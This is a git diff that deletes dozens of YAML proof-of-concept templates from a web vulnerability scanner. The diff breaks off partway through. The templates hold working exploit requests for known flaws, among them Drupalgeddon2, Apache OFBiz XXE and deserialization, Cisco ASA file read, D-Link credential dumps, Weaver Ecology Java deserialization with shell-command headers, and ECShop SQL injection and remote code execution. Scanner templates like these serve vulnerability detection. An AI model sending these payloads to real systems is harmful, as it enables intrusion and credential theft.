@@ -1,19 +0,0 @@ -name: poc-yaml-apache-ofbiz-cve-2020-9496-xml-deserialization -set: - rand: randomInt(200000000, 210000000) -rules: - - method: POST - path: /webtools/control/xmlrpc - headers: - Content-Type: application/xml - body: >- - {{rand}}dwisiswant0 - follow_redirects: false - expression: > - response.status == 200 && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand))) -detail: - author: su(https://suzzz112113.github.io/#blog) - links: - - https://lists.apache.org/thread.html/r84ccbfc67bfddd35dced494a1f1cba504f49ac60a2a2ae903c5492c3%40%3Cdev.ofbiz.apache.org%3E - - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb diff --git a/WebScan/pocs/apache-solr-file-read.yml b/WebScan/pocs/apache-solr-file-read.yml deleted file mode 100644 index d1f6648..0000000 --- a/WebScan/pocs/apache-solr-file-read.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-apache-solr-file-read -rules: - - method: GET - path: "/solr/admin/cores?indexInfo=false&wt=json" - search: | - "name":"(?P.+?)", - expression: - response.status == 200 - - method: POST - path: "/solr/{{core_name}}/config" - headers: - Content-type: application/json - body: | - {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} - expression: | - response.status == 200 && response.body.bcontains(b"This") -detail: - author: flyinbed - links: - - "https://mp.weixin.qq.com/s/iX2OasjynZ0MAvNTvIcmjg" - - "https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ" \ No newline at end of file diff --git a/WebScan/pocs/apacheofbiz-cve-2018-8033-xxe.yml b/WebScan/pocs/apacheofbiz-cve-2018-8033-xxe.yml deleted file mode 100644 index 51a6e22..0000000 --- a/WebScan/pocs/apacheofbiz-cve-2018-8033-xxe.yml +++ /dev/null 
@@ -1,15 +0,0 @@ -name: poc-yaml-apacheofbiz-cve-2018-8033-xxe -rules: - - method: POST - path: /webtools/control/xmlrpc - headers: - Content-Type: application/xml - body: >- - ]>&disclose; - follow_redirects: false - expression: > - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) && response.content_type.contains("text/xml") -detail: - author: su(https://suzzz112113.github.io/#blog) - links: - - https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py \ No newline at end of file diff --git a/WebScan/pocs/bt742-pma-unauthorized-access.yml b/WebScan/pocs/bt742-pma-unauthorized-access.yml deleted file mode 100644 index 5292fe8..0000000 --- a/WebScan/pocs/bt742-pma-unauthorized-access.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-bt742-pma-unauthorized-access -rules: - - method: GET - path: /pma/ - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"information_schema") && response.body.bcontains(b"phpMyAdmin") && response.body.bcontains(b"server_sql.php") -detail: - author: Facker007(https://github.com/Facker007) - links: - - https://mp.weixin.qq.com/s/KgAaFRKarMdycYzETyKS8A diff --git a/WebScan/pocs/cisco-cve-2020-3452-readfile.yml b/WebScan/pocs/cisco-cve-2020-3452-readfile.yml deleted file mode 100644 index 0f4634b..0000000 --- a/WebScan/pocs/cisco-cve-2020-3452-readfile.yml +++ /dev/null 
@@ -1,11 +0,0 @@ -name: poc-yaml-cisco-cve-2020-3452-readfile -rules: - - method: GET - path: /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua - follow_redirects: false - expression: response.status == 200 && response.headers["Content-Type"] == "application/octet-stream" && response.body.bcontains(b"INTERNAL_PASSWORD_ENABLED") -detail: - author: JrD (https://github.com/JrDw0/) - links: - - https://nvd.nist.gov/vuln/detail/CVE-2020-3452 - - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 diff --git a/WebScan/pocs/coremail-cnvd-2019-16798.yml b/WebScan/pocs/coremail-cnvd-2019-16798.yml deleted file mode 100644 index 097f5fa..0000000 --- a/WebScan/pocs/coremail-cnvd-2019-16798.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-coremail-cnvd-2019-16798 -rules: - - method: GET - path: >- - /mailsms/s?func=ADMIN:appState&dumpConfig=/ - follow_redirects: false - expression: > - response.status == 200 && response.body.bcontains(bytes("")) -detail: - author: cc_ci(https://github.com/cc8ci) - links: - - https://www.secpulse.com/archives/107611.html \ No newline at end of file diff --git a/WebScan/pocs/discuz-ml3x-cnvd-2019-22239.yml b/WebScan/pocs/discuz-ml3x-cnvd-2019-22239.yml deleted file mode 100644 index 4445bce..0000000 --- a/WebScan/pocs/discuz-ml3x-cnvd-2019-22239.yml +++ /dev/null 
@@ -1,22 +0,0 @@ -name: poc-yaml-discuz-ml3x-cnvd-2019-22239 -set: - r1: randomInt(800000000, 1000000000) -rules: - - method: GET - path: /forum.php - follow_redirects: false - expression: | - response.status == 200 - search: cookiepre = '(?P[\w_]+)' - - method: GET - path: /forum.php - headers: - Cookie: "{{token}}language=sc'.print(md5({{r1}})).'" - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(md5(string(r1)))) -detail: - author: X.Yang - Discuz_version: Discuz!ML 3.x - links: - - https://www.cnvd.org.cn/flaw/show/CNVD-2019-22239 diff --git a/WebScan/pocs/dlink-cve-2019-17506.yml b/WebScan/pocs/dlink-cve-2019-17506.yml deleted file mode 100644 index 87cdc7d..0000000 --- a/WebScan/pocs/dlink-cve-2019-17506.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-dlink-cve-2019-17506 -rules: - - method: POST - path: /getcfg.php - headers: - Content-Type: application/x-www-form-urlencoded - body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a - follow_redirects: false - expression: > - response.status == 200 && response.body.bcontains(b"") && response.body.bcontains(b"") -detail: - author: l1nk3r,Huasir(https://github.com/dahua966/) - links: - - https://xz.aliyun.com/t/6453 diff --git a/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml b/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml deleted file mode 100644 index 7fa21e7..0000000 --- a/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-dlink-cve-2020-25078-account-disclosure -rules: - - method: GET - path: >- - /config/getuser?index=0 - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=") && response.headers["Content-Type"].contains("text/plain") -detail: - author: kzaopa(https://github.com/kzaopa) - links: - - https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg \ No newline at end of file 
diff --git a/WebScan/pocs/dlink-cve-2020-9376-dump-credentials.yml b/WebScan/pocs/dlink-cve-2020-9376-dump-credentials.yml deleted file mode 100644 index fcbcf31..0000000 --- a/WebScan/pocs/dlink-cve-2020-9376-dump-credentials.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-dlink-cve-2020-9376-dump-credentials -rules: - - method: POST - path: /getcfg.php - headers: - Content-Type: application/x-www-form-urlencoded - body: >- - SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1 - expression: > - response.status == 200 && response.body.bcontains(b"Admin") && response.body.bcontains(b"") && response.body.bcontains(b"") -detail: - author: x1n9Qi8 - Affected Version: "Dlink DIR-610" - links: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376 \ No newline at end of file diff --git a/WebScan/pocs/dlink-dcs-info-leak.yml b/WebScan/pocs/dlink-dcs-info-leak.yml deleted file mode 100644 index 746ff9f..0000000 --- a/WebScan/pocs/dlink-dcs-info-leak.yml +++ /dev/null @@ -1,9 +0,0 @@ -name: poc-yaml-dlink-dcs-info-leak -rules: - - method: GET - path: /config/getuser?index=0 - expression: response.status == 200 && response.body.bcontains(b"name=") && response.body.bcontains(b"pass=") && response.body.bcontains(b"priv=") -detail: - author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/cG868wc7dmwxFslcwlgDpw \ No newline at end of file diff --git a/WebScan/pocs/docker-api-unauthorized-rce.yml b/WebScan/pocs/docker-api-unauthorized-rce.yml deleted file mode 100644 index 2ddd55a..0000000 --- a/WebScan/pocs/docker-api-unauthorized-rce.yml +++ /dev/null 
@@ -1,12 +0,0 @@
-name: poc-yaml-docker-api-unauthorized-rce
-rules:
- - method: GET
- path: /info
- follow_redirects: false
- expression: |
- response.status == 200 && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir")
-
-detail:
- author: j4ckzh0u(https://github.com/j4ckzh0u)
- links:
- - https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-rce
diff --git a/WebScan/pocs/docker-registry-api-unauth.yml b/WebScan/pocs/docker-registry-api-unauth.yml
deleted file mode 100644
index 8b7f36d..0000000
--- a/WebScan/pocs/docker-registry-api-unauth.yml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-docker-registry-api-unauth
-rules:
- - method: GET
- path: /v2/
- follow_redirects: false
- expression: >
- response.status == 200 && "docker-distribution-api-version" in response.headers && response.headers["docker-distribution-api-version"].contains("registry/2.0")
- - method: GET
- path: /v2/_catalog
- follow_redirects: false
- expression: >
- response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"repositories")
-detail:
- author: p0wd3r
- links:
- - http://www.polaris-lab.com/index.php/archives/253/
diff --git a/WebScan/pocs/druid-monitor-unauth.yml b/WebScan/pocs/druid-monitor-unauth.yml
deleted file mode 100644
index 15d2adb..0000000
--- a/WebScan/pocs/druid-monitor-unauth.yml
+++ /dev/null
@@ -1,10 +0,0 @@
-name: poc-yaml-druid-monitor-unauth
-rules:
- - method: GET
- path: /druid/index.html
- expression: |
- response.status == 200 && response.body.bcontains(b"Druid Stat Index") && response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers")
-detail:
- author: met7or
- links:
- - https://github.com/alibaba/druid
diff --git a/WebScan/pocs/drupal-cve-2014-3704-sqli.yml b/WebScan/pocs/drupal-cve-2014-3704-sqli.yml
deleted file mode 100644
index 87d6939..0000000
--- a/WebScan/pocs/drupal-cve-2014-3704-sqli.yml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: poc-yaml-drupal-cve-2014-3704-sqli
-rules:
- - method: POST
- path: /?q=node&destination=node
- body: >-
- pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or
- updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a
- follow_redirects: false
- expression: |
- response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53")
-detail:
- Affected Version: "Drupal < 7.32"
- links:
- - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704
\ No newline at end of file
diff --git a/WebScan/pocs/drupal-cve-2018-7600-rce.yml b/WebScan/pocs/drupal-cve-2018-7600-rce.yml
deleted file mode 100644
index 22cdad0..0000000
--- a/WebScan/pocs/drupal-cve-2018-7600-rce.yml
+++ /dev/null
@@ -1,19 +0,0 @@
-name: poc-yaml-drupal-cve-2018-7600-rce
-set:
- r1: randomLowercase(4)
- r2: randomLowercase(4)
-rules:
- - method: POST
- path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
- headers:
- Content-Type: application/x-www-form-urlencoded
- body: |
- form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
- expression: |
- response.body.bcontains(bytes(r1 + "%" + r2))
-detail:
- links:
- - https://github.com/dreadlocked/Drupalgeddon2
- - https://paper.seebug.org/567/
-test:
- target: http://cve-2018-7600-8-x.vulnet:8080/
diff --git a/WebScan/pocs/drupal-cve-2018-7600-rce2.yml b/WebScan/pocs/drupal-cve-2018-7600-rce2.yml
deleted file mode 100644
index 9e723bb..0000000
--- a/WebScan/pocs/drupal-cve-2018-7600-rce2.yml
+++ /dev/null
@@ -1,29 +0,0 @@
-name: poc-yaml-drupal-cve-2018-7600-rce
-set:
- r1: randomLowercase(4)
- r2: randomLowercase(4)
-rules:
- - method: POST
- path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
- headers:
- Content-Type: application/x-www-form-urlencoded
- body: |
- form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
- search: |
- name="form_build_id"\s+value="(?P.+?)"
- expression: |
- response.status == 200
- - method: POST
- path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
- headers:
- Content-Type: application/x-www-form-urlencoded
- body: |
- form_build_id={{build_id}}
- expression: |
- response.body.bcontains(bytes(r1 + "%" + r2))
-detail:
- links:
- - https://github.com/dreadlocked/Drupalgeddon2
- - https://paper.seebug.org/567/
-test:
- target: http://cve-2018-7600-8-x.vulnet:8080/
diff --git a/WebScan/pocs/drupal-cve-2019-6340.yml b/WebScan/pocs/drupal-cve-2019-6340.yml
deleted file mode 100644
index 178a62b..0000000
--- a/WebScan/pocs/drupal-cve-2019-6340.yml
+++ /dev/null
@@ -1,33 +0,0 @@
-name: poc-yaml-drupal-cve-2019-6340
-set:
- host: request.url.host
- r1: randomLowercase(4)
- r2: randomLowercase(4)
-rules:
- - method: POST
- path: /node/?_format=hal_json
- headers:
- Content-Type: application/hal+json
- Accept: '*/*'
- body: |
- {
- "link": [
- {
- "value": "link",
- "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:10:\"{{r1}}%%{{r2}}\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"printf\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
- }
- ],
- "_links": {
- "type": {
- "href": "http://{{host}}/rest/type/shortcut/default"
- }
- }
- }
- follow_redirects: true
- expression: |
- response.status == 403 && response.body.bcontains(bytes(r1 + "%" + r2))
-detail:
- author: thatqier
- links:
- - https://github.com/jas502n/CVE-2019-6340
- - https://github.com/knqyf263/CVE-2019-6340
\ No newline at end of file
diff --git a/WebScan/pocs/drupal-drupal7geddon2-rce.yml b/WebScan/pocs/drupal-drupal7geddon2-rce.yml
deleted file mode 100644
index d9897e4..0000000
--- a/WebScan/pocs/drupal-drupal7geddon2-rce.yml
+++ /dev/null
@@ -1,28 +0,0 @@
-name: poc-yaml-drupal-drupalgeddon2-rce # nolint[:namematch]
-set:
- r1: randomLowercase(4)
- r2: randomLowercase(4)
-rules:
- - method: POST
- path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
- headers:
- Content-Type: application/x-www-form-urlencoded
- body: |
- form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
- search: |
- name="form_build_id"\s+value="(?P.+?)"
- expression: |
- response.status == 200
- - method: POST
- path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
- headers:
- Content-Type: application/x-www-form-urlencoded
- body: |
- form_build_id={{build_id}}
- expression: |
- response.body.bcontains(bytes(r1 + "%" + r2))
-detail:
- drupal_version: 7
- links:
- - https://github.com/dreadlocked/Drupalgeddon2
- - https://paper.seebug.org/567/
diff --git a/WebScan/pocs/drupal-drupal8geddon2-rce.yml b/WebScan/pocs/drupal-drupal8geddon2-rce.yml
deleted file mode 100644
index d8f6192..0000000
--- a/WebScan/pocs/drupal-drupal8geddon2-rce.yml
+++ /dev/null
@@ -1,20 +0,0 @@
-name: poc-yaml-drupal-drupalgeddon2-rce # nolint[:namematch]
-set:
- r1: randomLowercase(4)
- r2: randomLowercase(4)
-rules:
- - method: POST
- path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
- headers:
- Content-Type: application/x-www-form-urlencoded
- body: |
- form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
- expression: |
- response.body.bcontains(bytes(r1 + "%" + r2))
-detail:
- drupal_version: 8
- links:
- - https://github.com/dreadlocked/Drupalgeddon2
- - https://paper.seebug.org/567/
-test:
- target: http://cve-2018-7600-8-x.vulnet:8080/
diff --git a/WebScan/pocs/ecology-sqli.yml b/WebScan/pocs/ecology-sqli.yml
deleted file mode 100644
index 3a732d1..0000000
--- a/WebScan/pocs/ecology-sqli.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-name: poc-yaml-ecology-sqli
-set:
- rand: randomInt(200000000, 210000000)
-rules:
- - method: GET
- path: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20md5({{rand}})%20as%20id%20from%20HrmResourceManager
- follow_redirects: false
- expression: |
- response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
-detail:
- author: whami-root(https://github.com/whami-root)
- links:
- - https://github.com/whami-root
\ No newline at end of file
diff --git a/WebScan/pocs/ecology-validate-sqli.yml b/WebScan/pocs/ecology-validate-sqli.yml
deleted file mode 100644
index 52d4c88..0000000
--- a/WebScan/pocs/ecology-validate-sqli.yml
+++ /dev/null
@@ -1,17 +0,0 @@ -name: poc-yaml-ecology-validate-sqli -set: - r1: randomInt(8000, 9999) - r2: randomInt(800, 1000) -rules: - - method: POST - path: /cpt/manage/validate.jsp?sourcestring=validateNum - body: >- - sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0
d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str({{r1}}*{{r2}})&capitalnum=-10 - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: fuping - links: - - https://news.ssssafe.com/archives/3325 - - https://www.weaver.com.cn/cs/securityDownload.asp \ No newline at end of file diff --git a/WebScan/pocs/ecology-workflowservicexml-2.yml b/WebScan/pocs/ecology-workflowservicexml-2.yml deleted file mode 100644 index 46d2ace..0000000 --- a/WebScan/pocs/ecology-workflowservicexml-2.yml +++ /dev/null 
@@ -1,20 +0,0 @@ -name: poc-yaml-ecology-workflowservicexml -set: - rand1: randomInt(1000, 9999) - rand2: randomInt(1000, 9999) -rules: - - method: POST - path: /services%20/WorkflowServiceXml - headers: - Content-Type: text/xml - cmd: bin/bash -c 'expr {{rand1}} + {{rand2}}' - follow_redirects: false - body: | - <java.util.PriorityQueue serialization="custom"> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> <comparator class="org.apache.commons.beanutils.BeanComparator"> <property>outputProperties</property> <comparator class="org.apache.commons.collections.comparators.ComparableComparator"/> </comparator> </default> <int>3</int> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom"> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <default> <__name>Pwnr</__name> <__bytecodes> <byte-array>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</byte-array> <byte-array>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</byte-array> </__bytecodes> <__transletIndex>-1</__transletIndex> <__indentNumber>0</__indentNumber> </default> <boolean>false</boolean> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/> </java.util.PriorityQueue> </java.util.PriorityQueue> 2 - expression: | - response.body.bcontains(bytes(string(rand1 + rand2))) -detail: - author: tangshoupu - info: ecology-workflowservicexml-rce - links: - - https://www.anquanke.com/post/id/239865 \ No newline at end of file diff --git a/WebScan/pocs/ecology-workflowservicexml.yml b/WebScan/pocs/ecology-workflowservicexml.yml deleted file mode 100644 index 1e0c50f..0000000 --- a/WebScan/pocs/ecology-workflowservicexml.yml +++ /dev/null 
@@ -1,20 +0,0 @@ -name: poc-yaml-ecology-workflowservicexml -set: - rand1: randomInt(1000, 9999) - rand2: randomInt(1000, 9999) -rules: - - method: POST - path: /services%20/WorkflowServiceXml - follow_redirects: false - headers: - Content-Type: text/xml - cmd: type c:\\windows\\win.ini - body: | - <java.util.PriorityQueue serialization="custom"> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> <comparator class="org.apache.commons.beanutils.BeanComparator"> <property>outputProperties</property> <comparator class="org.apache.commons.collections.comparators.ComparableComparator"/> </comparator> </default> <int>3</int> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom"> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <default> <__name>Pwnr</__name> <__bytecodes> <byte-array>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</byte-array> <byte-array>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</byte-array> </__bytecodes> <__transletIndex>-1</__transletIndex> <__indentNumber>0</__indentNumber> </default> <boolean>false</boolean> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/> </java.util.PriorityQueue> </java.util.PriorityQueue> 2 - expression: | - response.status == 500 && response.headers["Set-Cookie"].contains("ecology") && response.body.bcontains(b"for 16-bit app support") -detail: - author: tangshoupu - info: ecology-workflowservicexml-rce - links: - - https://www.anquanke.com/post/id/239865 \ No newline at end of file diff --git a/WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml b/WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml deleted file mode 100644 index 0b7721c..0000000 --- a/WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml +++ /dev/null 
@@ -1,13 +0,0 @@
-name: poc-yaml-ecshop-cnvd-2020-58823-sqli
-set:
- r1: randomInt(40000, 44800)
-rules:
- - method: POST
- path: /delete_cart_goods.php
- body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1))
- expression: |
- response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
-detail:
- author: 凉风(http://webkiller.cn/)
- links:
- - https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw
\ No newline at end of file
diff --git a/WebScan/pocs/ecshop-rce.yml b/WebScan/pocs/ecshop-rce.yml
deleted file mode 100644
index bb9151c..0000000
--- a/WebScan/pocs/ecshop-rce.yml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: poc-yaml-ecshop-rce
-set:
- r1: randomInt(40000, 44800)
- r2: randomInt(40000, 44800)
-rules:
- - method: POST
- path: /user.php
- headers:
- Referer: >-
- 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
- Content-Type: application/x-www-form-urlencoded
- body: action=login&pp123=printf({{r1}}*{{r2}});
- expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
-detail:
- author: 凉风(http://webkiller.cn/)
- links:
- - https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md
\ No newline at end of file
diff --git a/WebScan/pocs/ecshop-rce2.yml b/WebScan/pocs/ecshop-rce2.yml
deleted file mode 100644
index c79f02c..0000000
--- a/WebScan/pocs/ecshop-rce2.yml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: poc-yaml-ecshop-rce
-set:
- r1: randomInt(40000, 44800)
- r2: randomInt(40000, 44800)
-rules:
- - method: POST
- path: /user.php
- headers:
- Referer: >-
- 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads
- Content-Type: application/x-www-form-urlencoded
- body: action=login&pp123=printf({{r1}}*{{r2}});
- expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
-detail:
- author: 凉风(http://webkiller.cn/)
- links:
- - https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md
\ No newline at end of file
diff --git a/WebScan/pocs/elasticsearch-unauth.yml b/WebScan/pocs/elasticsearch-unauth.yml
deleted file mode 100644
index 18b7cd1..0000000
--- a/WebScan/pocs/elasticsearch-unauth.yml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-elasticsearch-unauth
-rules:
- - method: GET
- path: /
- follow_redirects: false
- expression: |
- response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"You Know, for Search")
- - method: GET
- path: /_cat
- follow_redirects: false
- expression: |
- response.status == 200 && response.body.bcontains(b"/_cat/master")
-detail:
- author: p0wd3r
- links:
- - https://yq.aliyun.com/articles/616757
diff --git a/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml b/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml
deleted file mode 100644
